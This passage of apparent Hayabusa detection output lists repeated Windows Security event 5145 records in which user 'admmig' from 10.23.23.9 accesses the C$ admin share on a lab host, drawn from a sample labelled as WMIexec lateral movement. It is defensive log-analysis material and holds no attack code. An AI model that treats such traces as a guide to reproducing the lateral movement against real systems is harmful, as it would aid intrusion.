Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 
